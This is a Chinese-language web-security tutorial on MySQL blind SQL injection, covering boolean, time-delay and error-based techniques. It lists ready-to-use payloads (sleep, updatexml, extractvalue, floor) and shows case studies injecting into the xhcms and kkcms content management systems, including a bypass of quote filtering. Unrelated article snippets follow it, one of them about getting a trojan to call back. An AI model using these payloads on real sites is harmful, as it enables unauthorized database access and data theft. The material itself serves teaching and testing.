Web攻防04_MySQL注入_盲注

news2024/12/22 6:00:43

文章目录

  • MYSQL-SQL操作-增删改查
  • 盲注概念
  • 盲注分类
  • 盲注语句
      • 参考&更多盲注语句/函数
  • 注入条件-数据回显&错误处理
      • PHP开发项目-注入相关条件:
      • 基于延时:
      • 基于布尔:
      • 基于报错:
  • CMS案例-插入报错&删除延时-PHP&MYSQL
    • 1、xhcms-insert报错
    • 2、kkcms-delete延时
      • 总结

请添加图片描述

参考:https://www.jianshu.com/p/bc35f8dd4f7c

MYSQL-SQL操作-增删改查

1、功能:数据查询

查询:SELECT * FROM news where id=$id

2、功能:新增用户,添加新闻等

增加:INSERT INTO news (字段名) VALUES (数据)

3、功能:删除用户,删除新闻等

删除:DELETE FROM news WHERE id=$id

4、功能:修改用户,修改文章等

修改:UPDATE news SET id=$id

盲注概念

盲注就是在注入过程中,获取的数据不能回显至前端页面。

我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。(没有回显的注入)

解决:常规的联合查询注入不行的情况

盲注分类

我们可以知道盲注分为以下三类:

1、基于布尔的SQL盲注-逻辑判断

regexp,like,ascii,left,ord,mid

需要有回显,错了报错

2、基于时间的SQL盲注-延时判断

if,sleep

3、基于报错的SQL盲注-报错回显

floor,updatexml,extractvalue

一般用的较多的是延迟注入和报错注入,布尔需要有回显,一般网站都没有。

盲注语句

延迟:

and sleep(1);

and if(1>2,sleep(1),0);

and if(1<2,sleep(1),0);

布尔:

and length(database())=7; 数据库长度

and left(database(),1)=‘p’; database()的前一位

and left(database(),2)=‘pi’; database()的前两位

and substr(database(),1,1)=‘p’; database()的第一位

and substr(database(),2,1)=‘i’; database()的第二位

and ord(left(database(),1))=112;

报错:

and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)

0x7e —> 十六进制编码 ~ 为了更好的识别内容,有些工具为了识别也加入

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

有些报错语句基于MySQL版本决定。有些版本不支持一些语句,目前用的最多的语句:

1、通过floor报错,注入语句如下:
and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

2、通过ExtractValue报错,注入语句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3、通过UpdateXml报错,注入语句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

参考&更多盲注语句/函数

参考:https://www.jianshu.com/p/bc35f8dd4f7c

like 'ro%'            #判断ro或ro...是否成立 

regexp '^xiaodi[a-z]' #匹配xiaodi及xiaodi...等

if(条件,5,0)          #条件成立 返回5 反之 返回0

sleep(5)              #SQL语句延时执行5秒

mid(a,b,c)            #从位置b开始,截取a字符串的c位

substr(a,b,c)         #从位置b开始,截取字符串a的c长度

left(database(),1),database() #left(a,b)从左侧截取a的前b位

length(database())=8  #判断数据库database()名的长度

ord=ascii ascii(x)=97 #判断x的ascii码是否等于97

注入条件-数据回显&错误处理

PHP开发项目-注入相关条件:

1、是否有输出结果

2、是否开启报错

基于延时:

都不需要

and if(1=1,sleep(5),0)

基于布尔:

有数据库输出判断标准

and length(database())=6

基于报错:

有数据库报错处理判断标准

and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)

测试delete注入:(有无回显,有无报错)

删除(延迟):1 and if(1=1,sleep(5),0)

删除(布尔):3 and length(database())=6(无回显 无法判断注入)

删除(报错):4 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

CMS案例-插入报错&删除延时-PHP&MYSQL

1、xhcms-insert报错

审计时发现有报错注入:

请添加图片描述

找到网站中该处注入点:

请添加图片描述

写入注入的报错语句:

' and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1) and '

请添加图片描述

保存提交,得到注入结果:

请添加图片描述

注入得出MySQL版本。

2、kkcms-delete延时

审计时找到可注入点,但是没有回显也没有报错,只能延时注入:

请添加图片描述

找到页面位置:

请添加图片描述

由于该注入为延迟注入,需要判断时间,用burpsuite抓包进行改包注入,或用postman等工具进行测试较为方便。

抓到删除的包

使用延时语句进行注入:

and if(1=1,sleep(5),0)

or if(1=1,sleep(5),0)

发现并没有延时:

因为php中有自动过滤单引号,过滤了单引号所以注入失败,将字符换位ASCII码,即可绕过。

MySQL中ord()函数转换为ASCII码

**注入语句:**or if(ord(left(database(),1))=107,sleep(2),0)

ord(left(database(),1))=107该语句表示数据库名第一位的ASCII码为107,即为k

结果:出现延迟

请添加图片描述

总结

SQL注入-DNSlog带外显示,也就是需要通过SQL语句去请求外部网站,只有使用load_file()去载入外部网址内容才有可能,所以需要是root用户而且将安全开关关闭,才有可能,实战中基本不可能遇到。没有太大价值。

实际情况中手工注入的机会不多,一般都是先用工具注入,如果工具注入失败,再通过工具的结果情况判断,是哪方面原因,再结合手工注入进行对比,之后再对工具进行修复,对其语句进行修改,再用工具进行注入。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1119771.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

项目管理实战总结(一)-沟通路径问题

前言 那是2021年春节之后&#xff0c;我决定主动申请参与到这个项目&#xff0c;是知道工作强度大、难度大的情况的。有很多的同事是想躲&#xff0c;而我是明知山有虎偏向虎山行。我确定&#xff0c;通过这个项目&#xff0c;一定有我需要的东西。现在项目已经完成了终验专家…

java1.8流的新特性使用

案例描述 今天跟着黑马程序员的视频&#xff0c;完成“瑞吉外卖”项目的菜品信息管理模块的时候&#xff0c;遇到了一个比较陌生的写法 用到了Java8的新特性 stream().map((item) -> {}).collect() List<DishDto> collect records.stream().map((item) -> {DishDt…

数据库基础(一)【MySQL】

文章目录 安装 MySQL修改密码连接和退出数据库服务器使用 systemctl 管理服务器进程配置数据库从文件角度看待数据库查看连接情况 安装 MySQL 这是在 Linux 中安装 MySQL 的教程&#xff1a;Linux 下 MySQL 安装。本系列测试用的 MySQL 版本是 5.7&#xff0c;机器是 centOS7.…

力扣刷题 day51:10-21

1.分发饼干 假设你是一位很棒的家长&#xff0c;想要给你的孩子们一些小饼干。但是&#xff0c;每个孩子最多只能给一块饼干。 对每个孩子 i&#xff0c;都有一个胃口值 g[i]&#xff0c;这是能让孩子们满足胃口的饼干的最小尺寸&#xff1b;并且每块饼干 j&#xff0c;都有一…

Python在列表中如何对多个参数进行修改

1 问题 在python中经常会使用到列表&#xff0c;列表是常见的一种数据类型。对于一个庞大的列表&#xff0c;要调取列表中的对象&#xff0c;应如何快速准确的调取或快速的调取多个对象&#xff1f; 2 方法 解决问题的步骤采用如下方式&#xff1a; 基本的&#xff0c;已知元素…

【C语言进阶】指针进阶(三)

指针进阶&#xff08;三&#xff09; 9.指针和数组笔试题解析10.指针笔试题 9.指针和数组笔试题解析 数组名的理解 数组名是数组首元素的地址 但是有2个例外&#xff1a; sizeof(数组名)&#xff0c;这里的数组名表示整个数组&#xff0c;sizeof(数组名)计算的是整个数组的大…

5G投资下降,遥遥领先的主流5G或被运营商抛弃,“假5G”更获青睐

虽然媒体仍然在宣扬5G的诸多领先技术优势&#xff0c;不过需要付钱的运营商已在行动中做出抉择&#xff0c;那就是放缓主流5G的投资&#xff0c;大举投资曾被称为“假5G”的低频5G&#xff0c;现实迫使运营商做出了如此选择。 媒体披露的数据指2022年中国的5G投资下滑了2.5%&am…

golang 反射机制

在 go 语言中&#xff0c;实现反射能力的是 reflect包&#xff0c;能够让程序操作不同类型的对象。其中&#xff0c;在反射包中有两个非常重要的 类型和 函数&#xff0c;两个函数分别是&#xff1a; reflect.TypeOfreflect.ValueOf 两个类型是 reflect.Type 和 reflect.Value…

1024程序员博客创作者活动

1024程序员博客创作者活动 参加博客创作者活动&#xff0c;获取创作者荣誉、活动奖品、稿费、涨粉。每到节假日就会出现比较多的活动 常见的博客网站有CSDN、博客园、掘金者、51CTO、简书、慕课笔记、开源中国。 最近1024出现了各种各样的程序员活动&#xff0c;而且活动的奖…

操作系统学习笔记6-文件系统

侵权请联系我&#xff0c;会及时删除的。下面的图片主要是B站UP主的课程中的截图。 课程推荐链接地址&#xff0c;这个课程很好&#xff0c;具体课程在B站。 操作系统 文章目录 1、文件系统的由来-文件的由来2、文件系统的由来-目录的由来3、文件管理逻辑图4、闲聊文件系统5、…

第五届太原理工大学程序设计竞赛新生赛(初赛)题解

第五届太原理工大学程序设计竞赛新生赛&#xff08;初赛&#xff09;题解 时隔半年重做一次&#xff0c;还是有几道不会&#xff0c;&#xff0c;&#xff0c;&#xff0c;&#xff0c; ⭐️A.饿饿饭饭 题目&#xff1a; &#x1f31f;题解&#xff1a; 很简单&#xff0c;签…

【软考】11.3 需求分析/获取/定义/验证/管理

《软件需求》 需求分类 需求获取 联合需求计划&#xff08;JRP&#xff09;&#xff1a;联合各个关键用户代表、系统分析师、开发团队代表一起讨论需求 需求分析 结构化的需求分析 自顶向下&#xff0c;逐步分解&#xff0c;面向数据 功能模型&#xff08;数据流图&#xff0…

跟随光标圆形文本旋转

今天给大家带来的是光标变成圆形字符串环绕 不多说先上效果图 原理呢,也很简单 就是先把文本 <h2>大威天龙 - 世尊地藏 - 般若诸佛 - 般若巴嘛哄 -</h2>然后使用js将文本处理成每个字符一个span,并且让他们旋转 let text document.querySelector(h2)text.innerH…

详解FAT32文件系统的簇

FAT32文件系统中&#xff0c;簇&#xff08;Cluster&#xff09;是文件分配的基本单位。它是一组连续的扇区&#xff08;通常是硬盘扇区&#xff09;的集合&#xff0c;用于存储文件的数据。以下是关于FAT32簇的一些详细介绍&#xff1a; 簇的大小&#xff1a;簇的大小是FAT32文…

Node学习笔记之path模块

path 模块提供了 操作路径 的功能&#xff0c;我们将介绍如下几个较为常用的几个 API&#xff1a; API 说明 path.resolve 拼接规范的绝对路径常用 path.sep 获取操作系统的路径分隔符 path.parse 解析路径并返回对象 path.basename 获取路径的基础名称 path.dirname…

实际项目中最常用的设计模式

在软件开发领域,设计模式是一种经过验证的通用解决方案,用于解决各种常见问题。它们有助于提高代码的可维护性、可扩展性和可重用性。虽然有许多不同的设计模式,但以下是实际项目中最常用的一些: 1. 单例模式 (Singleton Pattern) 单例模式确保一个类只有一个实例,并提供…

计算机组成原理第三章 11 存储器的层次结构 存储器的分类 存储器的性能指标

文章目录 存储器的层次结构存储器的分类(存储介质分类)存取方式分类读写方式分类(是否可读可写)断电后信息是否丢失信息是否被破坏 存储器的性能指标 存储器的层次结构 其中CPU可以直接和cache和主存进行交互。辅存内的数据需要调到主存内才能被CPU访问&#xff0c;这很好理解&…

【C语言】指针进阶【下】

&#x1f388;个人主页&#xff1a;.满船清梦压星河_-CSDN博客 &#x1f302;c/c领域新星创作者 &#x1f389;欢迎&#x1f44d;点赞✍评论❤️收藏 &#x1f61b;&#x1f61b;&#x1f61b;希望我的文章能对你有所帮助&#xff0c;有不足的地方还请各位看官多多指教&#xf…

修改ConsoleApplication17_2项目实现oss上线

首先创建号oss&#xff0c;上传文件&#xff0c;复制临时链接 木马内写 可以看到能成功上线但是有个问题就是占用cpu大小为9%左右&#xff0c;这里我用的是腾讯云oss实现的&#xff0c;用阿里云oss实现也是9%左右 我再次进行url的aes加密 还是百分之9左右&#xff0c; 这里…

利用ChatGPT进行数据分析并生成数据分析报告

目录 1 1 请罗列出中国所有的省份 按省份人口数量排序&#xff0c;给出序号&#xff0c;并整理成表格&#xff0c;人口最多的排在最前面&#xff1b; 在原有的数据源上&#xff0c;添加一些新的分类&#xff0c;并将分类结果进行反馈。 在表格中添加以下类别&#xff1a;男女…